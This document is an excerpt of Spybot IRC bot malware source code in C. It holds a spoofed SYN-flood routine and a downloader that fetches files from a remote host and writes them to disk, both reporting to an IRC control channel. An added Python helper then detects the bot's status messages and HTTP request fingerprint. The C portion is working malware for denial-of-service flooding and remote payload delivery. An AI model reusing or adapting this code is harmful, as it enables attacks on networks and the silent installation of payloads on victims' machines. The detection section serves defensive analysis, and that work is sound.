2940 		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
2941 		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
2942 		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
2943 
2944 		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
2945 
2946 		rect = sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(struct sockaddr*)&addr_in, sizeof(addr_in)); 
2947 		if (rect==SOCKET_ERROR) 
2948 		{  
2949 			strcpy(sendbuf,"SOCKET ERROR");
2950 			goto end;
2951 		} 
2952 
2953 		Count++;
2954 		if (Count > Spoofdsyn[num].times) break;
2955 	} 
2956 	strcpy(sendbuf,"Spoofd synpackets send");
2957 	end:;
2958 	char buf[512];
2959 	sprintf(buf,"PRIVMSG %s :%s\n\r",chan,sendbuf);
2960 	send(Spoofdsyn[num].sock,buf,strlen(buf),0);
2961 	Spoofdsyn[num].state = 0;
2962 	threads[Spoofdsyn[num].thread].id = 0;
2963 	return 0; 
2964 } 
2965 
2966 #endif
2967 
2968 #ifdef WEB_DOWNLOAD
2969 DWORD WINAPI download(LPVOID param)
2970 {
2971 	SOCKET ircsock;
2972 	ircsock = dcchosts;
2973 	char chan[250];
2974 	strcpy(chan,sendtochan);
2975 	int num = (int)param;
2976 	//we need the address of the server..
2977 	//first part of the url should always be http://
2978 	//we could use InternetOpenUrl but why do it easy if we can do it the hard way :D and its a bit better this way
2979 	char host[250];
2980 	char Rfilename[512];
2981 	memset(Rfilename,0,sizeof(Rfilename));
2982 	memset(host,0,sizeof(host));
2983 	char sendbuf[512];
2984 	char buffer[4096];
2985 	int c,d,p,port;
2986 	BOOL useport = FALSE;
2987 	d=0;
2988 	char tempport[5];
2989 	for (c=7;c<strlen(threads[num].dir);c++,d++)
2990 	{
2991 		if (threads[num].dir[c] == '/') break;
2992 		else if (threads[num].dir[c] == ':') { //not port 80 ?
2993 			p=0;
2994 			useport = TRUE;
2995 		}
2996 		else if (useport) {
2997 			tempport[p] = threads[num].dir[c];
2998 			p++;
2999 		}
3000 		else host[d] = threads[num].dir[c];
3001 	}
3002 	if (useport) { tempport[p] = '\0'; port = atoi(tempport); }
3003 	else port = 80;
3004 	host[d+1] = '\0';
3005 	//next create GET filename string 
3006 	strcpy(Rfilename,"GET ");
3007 	for (d=0;c<strlen(threads[num].dir);c++,d++)
3008 		sendbuf[d] = threads[num].dir[c];
3009 	sendbuf[d+1] = '\0';
3010 	sprintf(Rfilename,"GET %s HTTP/1.1\r\n Accept: */*\r\nAccept-Language: nl\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nHost: %s:%i\r\nConnection: Keep-Alive\r\n\r\n",sendbuf,host,port);
3011 
3012 	HANDLE filehandle;
3013 
3014 	//now lets make a connection and download the shit 
3015 	if ((threads[num].sock = create_sock(host,port)) < 1) {// could not connect
3016 		sprintf(sendbuf,"Error connecting");
3017 		goto end;
3018 	}
3019 	int err;
3020 	send(threads[num].sock,Rfilename,strlen(Rfilename),0);
3021 	memset(buffer,0,sizeof(buffer));
3022 	if ((err = recv(threads[num].sock, buffer, sizeof(buffer), 0)) < 1) { //this is the header we just ignore it
3023 		sprintf(sendbuf,"Error connecting");
3024 		goto end;
3025 	}
3026 	int size = err;
3027 	DWORD byteswriten;
3028 	filehandle = CreateFile(threads[num].file, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL);
3029 	if (filehandle == INVALID_HANDLE_VALUE) {
3030 		sprintf(sendbuf,"Error creating local file");
3031 		closesocket(threads[num].sock);
3032 		goto end;
3033 	}
3034 	strtok(buffer,"\r\n\r\n");
3035 	WriteFile(filehandle, buffer, err, &byteswriten, NULL);
3036 	while (err > 0) {
3037 		memset(buffer,0,sizeof(buffer));
3038 		err = recv(threads[num].sock, buffer, sizeof(buffer), 0);
3039 		if (err == 0) { //we hope everything went oke
3040 			sprintf(sendbuf,"file downloaded to %s size: %i",threads[num].file,size);
3041 			break;
3042 		}
3043 		if (err < 0) { //socket error
3044 			sprintf(sendbuf,"socket error");
3045 			break;
3046 		}
3047 		WriteFile(filehandle, buffer, err, &byteswriten, NULL);
3048 		size = size + err;
3049 	}
3050 	CloseHandle(filehandle);
3051 	end:;
3052 	sprintf(buffer,"PRIVMSG %s :%s\n\r",chan,sendbuf);
3053 	send(ircsock,buffer,strlen(buffer),0);
3054 	threads[num].id = 0;
3055 	return 0;
3056 }
3057 #endif
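As an added defensive example (not part of the Spybot source listed above, nor code from the aldeid page), the Python below turns two artefacts visible in that source into detection logic: the hard-coded status strings the bot reports back over IRC with `PRIVMSG`, and the fixed header layout of the `WEB_DOWNLOAD` request (leading space before `Accept`, `Accept-Language: nl`, an IE6/XP `User-Agent` with no space after the colon). The IRC log lines, channel name, path and host are constructed placeholders.

```python
"""Detection helper for the Spybot status messages and HTTP fingerprint.

Added example; the strings matched are copied from the bot source above,
the sample inputs are constructed for illustration.
"""
import re

# Status messages the bot writes to its IRC channel (from the source above).
BOT_STATUS_STRINGS = (
    "Could not read data from proccess",
    "Proccess has terminated",
    "Spoofd synpackets send",
    "file downloaded to ",
    "Error creating local file",
    "Error connecting",
    "WSA startup error",
)

# Header quirks of the downloader's hard-coded request: obsolete line folding
# (" Accept:" after CRLF), Dutch Accept-Language, IE6 UA with no space after ':'.
_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
_HTTP_MARKERS = ("\r\n Accept: */*", "Accept-Language: nl", "User-Agent:" + _UA)

_PRIVMSG = re.compile(r"PRIVMSG\s+(\S+)\s+:(.*)")


def classify_irc_line(line):
    """Return the bot status string an IRC PRIVMSG line starts with, else None."""
    m = _PRIVMSG.match(line.strip())
    if not m:
        return None
    body = m.group(2)
    for status in BOT_STATUS_STRINGS:
        if body.startswith(status):
            return status
    return None


def scan_irc_log(lines):
    """Return [(line_number, status_string), ...] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        tag = classify_irc_line(line)
        if tag:
            hits.append((n, tag))
    return hits


def is_bot_http_request(request):
    """True when a raw HTTP request carries all of the downloader's quirks."""
    return all(marker in request for marker in _HTTP_MARKERS)


# Constructed sample data (channel, path and host are placeholders).
SAMPLE_IRC_LOG = [
    "PRIVMSG #chan1 :hello everyone",
    "PRIVMSG #chan1 :file downloaded to c:\\update.exe size: 44576\n\r",
    "PING :irc.example.net",
    "PRIVMSG #chan1 :Spoofd synpackets send\n\r",
    "PRIVMSG #chan1 :Proccess has terminated\r",
]

SAMPLE_BOT_REQUEST = (
    "GET /files/update.exe HTTP/1.1\r\n Accept: */*\r\nAccept-Language: nl\r\n"
    "Accept-Encoding: gzip, deflate\r\nUser-Agent:" + _UA + "\r\n"
    "Host: www.example.com:80\r\nConnection: Keep-Alive\r\n\r\n"
)

SAMPLE_BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: curl/8.0\r\n\r\n"
)


if __name__ == "__main__":
    for n, tag in scan_irc_log(SAMPLE_IRC_LOG):
        print("line %d: bot status message %r" % (n, tag))
    print("bot request fingerprint:", is_bot_http_request(SAMPLE_BOT_REQUEST))
    print("benign request flagged:", is_bot_http_request(SAMPLE_BENIGN_REQUEST))
```

The IRC check keys on the message prefix rather than the whole line because `file downloaded to %s size: %i` carries a variable path and size; the HTTP check requires all three markers together, since any one of them alone (the IE6 UA in particular) is far too common to be a useful signal.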



Keywords: spybot 60e29751634c36ca26fd6acef4d9554e